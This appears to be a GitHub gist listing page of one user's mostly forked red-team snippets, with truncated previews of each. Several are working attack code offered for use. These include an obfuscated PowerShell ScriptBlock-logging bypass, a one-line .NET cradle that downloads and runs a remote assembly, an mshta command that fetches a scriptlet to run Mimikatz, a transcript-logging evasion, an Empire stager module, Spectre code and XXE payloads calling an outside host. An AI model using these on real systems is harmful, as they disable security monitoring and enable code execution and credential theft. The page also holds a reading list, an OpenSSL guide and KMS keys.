0x4243 / ScriptBlockLogBypass.ps1

Created November 18, 2017 05:16 — forked from cobbr/ScriptBlockLogBypass.ps1

ScriptBlock Logging Bypass

	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}

0x4243 / gist:257c37ccf70ce51d336fb3a7e1364a15

Created December 6, 2017 10:29 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3

Red Team Books

	From: http://redteams.net/bookshelf/
	Techie

	Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
	Social Engineering: The Art of Human Hacking by Christopher Hadnagy
	Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
	The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
	Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
	Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
	The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

0x4243 / id_rsa_encryption.md

Created December 20, 2017 15:18

Encrypt/Decrypt a File using your SSH Public/Private Key on Mac OS X

A Guide to Encrypting Files with Mac OS X

This guide will demonstrate the steps required to encrypt and decrypt files using OpenSSL on Mac OS X. The working assumption is that by demonstrating how to encrypt a file with your own public key, you'll also be able to encrypt a file you plan to send to somebody else using their private key, though you may wish to use this approach to keep archived data safe from prying eyes.

Too Long, Didn't Read

Assuming you've already done the setup described later in this document, that id_rsa.pub.pcks8 is the public key you want to use, that id_rsa is the private key the recipient will use, and secret.txt is the data you want to transmit…

Encrypting

$ openssl rand 192 -out key

$ openssl aes-256-cbc -in secret.txt -out secret.txt.enc -pass file:key

0x4243 / spectre.c

Created January 10, 2018 08:17 — forked from ErikAugust/spectre.c

Spectre example code

	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif

0x4243 / kmskeys10.txt

Created March 12, 2018 10:51 — forked from CHEF-KOCH/kmskeys10.txt

Windows 10 KMS Keys

	Windows.10.and.Office.2016.gVLK

	#####################################################################
	# Install/Uninstall keys #
	#####################################################################

	1.) Uninstall the current product by entering the “uninstall product key” extension:
	slmgr.vbs /upk

	2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10”

0x4243 / mimikatz.sct

Created March 17, 2018 12:55

Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"

	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="Bandit"
	progid="Bandit"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

0x4243 / DotnetAssemblyDownloadCradle.cs

Created June 21, 2018 20:57 — forked from cobbr/DotnetAssemblyDownloadCradle.cs

A download cradle for .NET assemblies.

public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

0x4243 / wmic_starfighters.py

Created July 19, 2018 04:33 — forked from infosecn1nja/wmic_starfighters.py

Empire stagers module to generates a squiblytwo and starfighters launcher.

	from lib.common import helpers

	class Stager:

	def __init__(self, mainMenu, params=[]):

	self.info = {
	'Name': 'wmic_xsl_starfighters',

	'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],

0x4243 / posh.cs

Created July 19, 2018 06:13 — forked from benpturner/posh.cs

No Powershell with Transcript Logging Evasion

	using System;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;

	namespace TranscriptBypass
	{
	// Compiling with CSC.exe v4.0.30319 or v3.5
	// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
	// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll

0x4243 / XXE_payloads

Created July 24, 2018 15:29 — forked from staaldraad/XXE_payloads

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>